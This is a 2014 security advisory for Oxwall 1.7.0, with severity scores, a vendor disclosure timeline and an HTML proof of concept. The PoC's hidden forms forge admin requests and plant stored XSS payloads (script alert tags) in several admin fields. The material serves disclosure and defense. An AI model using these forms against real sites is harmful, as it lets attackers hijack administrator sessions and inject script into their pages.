Lucene search

K
zeroscienceGjoko KrsticZSL-2014-5195
HistoryJul 28, 2014 - 12:00 a.m.

Oxwall 1.7.0 Multiple CSRF And HTML Injection Vulnerabilities

2014-07-2800:00:00
Gjoko Krstic
zeroscience.mk
110

CVSS2

6.8

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:M/Au:N/C:P/I:P/A:P

AI Score

6.7

Confidence

High

EPSS

0.012

Percentile

85.5%

Title: Oxwall 1.7.0 Multiple CSRF And HTML Injection Vulnerabilities
Advisory ID: ZSL-2014-5195
Type: Local/Remote
Impact: Cross-Site Scripting
Risk: (3/5)
Release Date: 28.07.2014

Summary

Oxwall is unbelievably flexible and easy to use PHP/MySQL social networking software platform.

Description

Oxwall version 1.7.0 suffers from multiple cross-site request forgery and stored xss vulnerabilities. The application allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site. Input passed to several POST parameters is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user’s browser session in context of an affected site.

Vendor

Oxwall Software Foundation - <http://www.oxwall.org>

Affected Version

1.7.0 (build 7907 and 7906)

Tested On

Kali Linux 3.7-trunk-686-pae
Apache/2.2.22 (Debian)
PHP 5.4.4-13(apache2handler)
MySQL 5.5.28

Vendor Status

[18.07.2014] Vulnerabilities discovered.
[18.07.2014] Vendor contacted.
[20.07.2014] No reply from the vendor.
[21.07.2014] Vendor contacted again.
[23.07.2014] Reminded vendor on twitter to check their e-mails.
[23.07.2014] No reply from the vendor whatsoever.
[23.07.2014] Created a forum account and contacted the vendor there.
[24.07.2014] Vendor responds on the forum post asking more details.
[24.07.2014] Informed the vendor to conference via e-mail.
[25.07.2014] Vendor responds on the e-mails sent previously, asking more details.
[25.07.2014] Sent detailed information to the vendor.
[27.07.2014] Asked vendor for status update.
[27.07.2014] No reply from the vendor.
[28.07.2014] Public security advisory released.

PoC

oxwall_csrfxss.html

Credits

Vulnerability discovered by Gjoko Krstic - <[email protected]>

References

[1] <http://packetstormsecurity.com/files/127652&gt;
[2] <http://www.exploit-db.com/exploits/34190/&gt;
[3] <http://cxsecurity.com/issue/WLB-2014070155&gt;
[4] <http://osvdb.org/show/osvdb/109622&gt;
[5] <http://osvdb.org/show/osvdb/109623&gt;
[6] <http://osvdb.org/show/osvdb/109624&gt;
[7] <http://osvdb.org/show/osvdb/109625&gt;
[8] <http://sebug.net/vuldb/ssvid-87164&gt;
[9] <http://www.securityfocus.com/bid/68938&gt;
[10] <http://secunia.com/advisories/59720/&gt;
[11] <http://xforce.iss.net/xforce/xfdb/94907&gt;
[12] <http://xforce.iss.net/xforce/xfdb/94908&gt;
[13] <http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-9101&gt;
[14] <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9101&gt;

Changelog

[28.07.2014] - Initial release
[29.07.2014] - Added reference [1], [2], [3], [4], [5], [6] and [7]
[30.07.2014] - Added reference [8] and [9]
[05.10.2014] - Added reference [10] and [11]
[20.10.2014] - Added reference [12]
[02.12.2014] - Added reference [13] and [14]

Contact

Zero Science Lab

Web: <http://www.zeroscience.mk>
e-mail: [email protected]

<!--

Oxwall 1.7.0 Multiple CSRF And HTML Injection Vulnerabilities


Vendor: Oxwall Software Foundation

Product web page: http://www.oxwall.org
Affected version: 1.7.0 (build 7907 and 7906)

Summary: Oxwall is unbelievably flexible and easy to use
PHP/MySQL social networking software platform.

Desc: Oxwall version 1.7.0 suffers from multiple cross-site
request forgery and stored xss vulnerabilities. The application
allows users to perform certain actions via HTTP requests
without performing any validity checks to verify the requests.
This can be exploited to perform certain actions with administrative
privileges if a logged-in user visits a malicious web site.
Input passed to several POST parameters is not properly
sanitised before being returned to the user. This can be
exploited to execute arbitrary HTML and script code in a
user's browser session in context of an affected site.

Tested on: Kali Linux 3.7-trunk-686-pae
           Apache/2.2.22 (Debian)
           PHP 5.4.4-13(apache2handler)
           MySQL 5.5.28


Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
                              @zeroscience


Advisory ID: ZSL-2014-5195
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5195.php



18.07.2014

--><html>
<head><title>Oxwall 1.7.0 Multiple CSRF And Stored XSS Vulnerabilities</title>
</head><body>
<form action="http://192.168.0.105/admin/users/roles/" method="POST">
<input name="form_name" type="hidden" value="add-role"/>
<input name="label" type="hidden" value='"&gt;&lt;script&gt;alert(1);&lt;/script&gt;'/>
<input name="submit" type="hidden" value="Add"/>
<input type="submit" value="Execute #1"/>
</form>
<form action="http://192.168.0.105/admin/questions/ajax-responder/" method="POST">
<input name="form_name" type="hidden" value="account_type_49693e2b1cb50cad5c42b18a9103f146dcce2ec6"/>
<input name="command" type="hidden" value="AddAccountType"/>
<input name="key" type="hidden" value="questions_account_type_5615100a931845eca8da20cfdf7327e0"/>
<input name="prefix" type="hidden" value="base"/>
<input name="accountTypeName" type="hidden" value="5615100a931845eca8da20cfdf7327e0"/>
<input name="lang[1][base][questions_account_type_5615100a931845eca8da20cfdf7327e0]" type="hidden" value='"&gt;&lt;script&gt;alert(2);&lt;/script&gt;'/>
<input name="role" type="hidden" value="12"/>
<input type="submit" value="Execute #2"/>
</form>
<form action="http://192.168.0.105/admin/questions/ajax-responder/" method="POST">
<input name="form_name" type="hidden" value="qst_add_form"/>
<input name="qst_name" type="hidden" value='"&gt;&lt;script&gt;alert(3);&lt;/script&gt;'/>
<input name="qst_description" type="hidden" value="ZSL"/>
<input name="qst_account_type[0]" type="hidden" value="290365aadde35a97f11207ca7e4279cc"/>
<input name="qst_section" type="hidden" value="f90cde5913235d172603cc4e7b9726e3"/>
<input name="qst_answer_type" type="hidden" value="text"/>
<input name="qst_possible_values" type="hidden" value="%5B%5D"/>
<input name="year_range[to]" type="hidden" value="1996"/>
<input name="year_range[from]" type="hidden" value="1930"/>
<input name="qst_column_count" type="hidden" value="1"/>
<input name="qst_required" type="hidden" value=""/>
<input name="qst_on_sign_up" type="hidden" value=""/>
<input name="qst_on_edit" type="hidden" value=""/>
<input name="qst_on_view" type="hidden" value=""/>
<input name="qst_on_search" type="hidden" value=""/>
<input name="valuesStorage" type="hidden" value="%7B%7D"/>
<input name="command" type="hidden" value="addQuestion"/>
<input type="submit" value="Execute #3"/>
</form>
<form action="http://192.168.0.105/admin/restricted-usernames" method="POST">
<input name="form_name" type="hidden" value='restrictedUsernamesForm"&gt;&lt;script&gt;alert(4);&lt;/script&gt;'/>
<input name="restrictedUsername" type="hidden" value='"&gt;&lt;script&gt;alert(5);&lt;/script&gt;'/>
<input name="addUsername" type="hidden" value="Add"/>
<input type="submit" value="Execute #4 &amp; #5"/>
</form>
</body>
</html>

CVSS2

6.8

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:M/Au:N/C:P/I:P/A:P

AI Score

6.7

Confidence

High

EPSS

0.012

Percentile

85.5%